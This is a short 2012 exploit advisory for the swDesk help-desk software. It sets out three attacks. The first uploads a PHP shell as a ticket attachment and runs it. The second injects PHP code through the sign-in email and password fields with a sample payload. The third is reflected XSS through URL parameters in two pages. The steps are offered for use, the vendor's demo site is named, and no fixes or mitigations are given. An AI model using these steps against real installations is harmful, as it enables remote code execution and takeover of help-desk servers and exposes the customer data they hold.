# Title     : swDesk Multi Vulnerability
# Author    : Red Security TEAM
# Date      : 01/02/2012
# Risk      : High
# Vendor    : http://www.swdesk.com/
# Demo      : http://www.swdesk.com/demo/swdesk/
# Tested On : Apache
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
# Exploit   :
# I. Arbitrary File Upload Vulnerability
# 1. Go to http://server/create_ticket.php
# 2. Fil all Input Fields And Click on Submit Ticket
# 3. Click on the View Ticket and you should go to the link Like : http://server/view_ticket.php?email=[Your Email]&id=1
# 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message
# 5. You can see your attachment above Like : Attachment: shell.php , Click on it and you see your PHP code has been runed ;)
# II. PHP Code Injection Vulnerability
# 1. Go to http://server/signin.php : Vulnerability Input Fields : email , password
# 2. Write your php in Input Fields Like : phpi${@print(RedSecurityTEAM)}
# III. XSS Vulnerability
# 1. http://server/view_ticket.php?email=example@example.com&id=" onmouseover=alert(1) bad="
# 2. http://server/kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search
# Thanks To : http://1337day.com/ , http://www.exploit-db.com/ , http://securityreason.com/ , http://packetstormsecurity.org/